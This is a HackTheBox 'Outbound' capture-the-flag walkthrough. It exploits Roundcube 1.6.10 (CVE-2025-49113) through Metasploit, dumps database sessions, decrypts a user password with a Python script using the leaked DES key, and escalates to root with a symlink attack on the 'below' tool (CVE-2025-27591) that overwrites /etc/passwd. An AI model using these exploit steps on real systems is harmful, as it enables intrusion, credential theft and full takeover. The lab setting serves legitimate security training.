HackTheBox Outbound Walkthough

insidepwninsidepwn
4 min read

Table of contents

This machine was an easy linux machine with initial credentials of user tyler:LhKL1o9Nm3X2

💡
This machine has some vpn issues , so if you get some errors that aren’t mean to be , try restarting your system.

Initial Enumeration

The nmap scan didn’t get us something great just 2 ports open 22 and 80

Foothold and user.txt

So we logged into mail.outbound.htb which is the domain , you can add the domain in /etc/hosts as

sudo nano /etc/hosts
<YOUR_MACHINE_IP>:mail.outbound.htb

Then log in as tyler with credentials given and what we will see as webmail is Roundcube and also the version is 1.6.10 , then i explored the website and found nothing

With the version i got i searched online for some cve and got one for rce which is CVE-2025-49113.

Also here is github link for exploit https://github.com/hakaioffsec/CVE-2025-49113-exploit but i recommend to use msfconsole for this , will tell later on in this part .

To run the exploit in your machine , first run metasploit using by typing msfconsole on your machine then type

search roundcube
use 1
set LHOST <YOUR_IP_OPENVPN>
set RHOSTS mail.outbound.htb
set USERNAME tyler
set PASSWORD LhKL1o9Nm3X2
exploit

let the exploit run then type shell to stabilize it type script /dev/null -c bash this will give you shell as www-data

now in further exploring i found conf file at directory /var/www/html/roundcube/config/config.inc.php , in this i got credentials of mysql service

one more thing in this conf file i got was decryption key which will be used later

now using the mysql pass i had i ran following commands to see databases ( the command worked in metasploit shell but not in the shell we will get from github exploit ; idk why this was happening )

mysql -u roundcube -pRCDBPass2025

To further enumerate the databases i ran the following commands

SHOW DATABASES;
use roundcube;
SHOW TABLES;
select * from session;

The thing here we are doing is seeing how many databases are there , then using a particular roundcube database , then getting data from session table in it . The data was obviously of users .

this was the important one so decode the base64 we get data of user jacob

the password L7Rv00A8TuwJAr67kITxxcSgnIk25Am/ we get here is encrypted so i searched a bit more to see how to decrypt it and got some info from file /var/www/html/roundcube/program/lib/Roundcube/rcube.php , the info was the decrypt function

here it is using a $key called ‘des_key; which we got from /var/www/html/roundcube/config/config.inc.php ( scroll bit up ) , anyways i will paste it here rcmail-!24ByteDESkey*Str

With the help of chatgpt i created a code to decrypt the password

from base64 import b64decode
from Crypto.Cipher import DES3

# Encrypted password string
encrypted_password = "L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"

# 24-byte DES3 key
des_key = b'rcmail-!24ByteDESkey*Str'

# Decode the base64-encoded data
data = b64decode(encrypted_password)

# Extract IV (first 8 bytes) and ciphertext (rest)
iv = data[:8]
ciphertext = data[8:]

# Initialize DES3 cipher in CBC mode
cipher = DES3.new(des_key, DES3.MODE_CBC, iv)

# Decrypt the ciphertext
decrypted = cipher.decrypt(ciphertext)

# Remove padding (manually strip padding bytes)
cleaned = decrypted.rstrip(b"\x00").rstrip(b"\x08").decode('utf-8', errors='ignore')

print("[+] Pass", cleaned)

Make sure you get modules found , using this we will get the pass for user jacob

With credentials of jacob we will logon on the website and will find 2 mails in his inbox

in this mail we get ssh credentials of jacob and in other mail

we are told about some priveleges to inspect log , but ssh with jacob credentials

ssh jacob@mail.outbound.htb

and BOOM !! we got user.txt

Privilege Escalation and root.txt

For privilege escalation i first did the most common sudo -l checking what jacob run with sudo but without password

Before moving on the below binary is used to monitor resources of system , logs , usage and other things .To read more check out this.

so now we will exploit the below binary , first i didn’t get something great but upon checking its version which you can by running

sudo /usr/bin/below live

so the version came out to be 0.8.0 .

Now I searched online for some exploit in the version and I stumbled across this cve CVE-2025-27591 , to read more about this cve , read this .

So the cve was to exploit escalate low unprivileged users to root through symlink attacks. The way we will exploit this follows as:-

  1. Create a user with uid and gid of root

  2. Remove the log error of root at /var/log/below/error_root.log

  3. Symlink /etc/passwd and error_root.log

  4. Using below binary take a snapshot which will again create a error_root.log

  5. Overwrite /etc/passwd

  6. Switch to user new user

echo 'spy::0:0:spy:/root:/bin/bash' > /tmp/spyuser
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
sudo /usr/bin/below snapshot --begin now
cp /tmp/spyuser /var/log/below/error_root.log
su spy

Using these commands , you will gain root access.

and now you can read root.txt

This is it for the machine

Thanks for reading the walkthrough. Hope you like it ! Do leave a comment for feedback or queries !!

10
Subscribe to my newsletter

Read articles from insidepwn directly inside your inbox. Subscribe to the newsletter, and don't miss out.

#HackTheBoxhackthebox machinered teamLinuxPrivilege Escalationhacking

Written by

insidepwn
insidepwn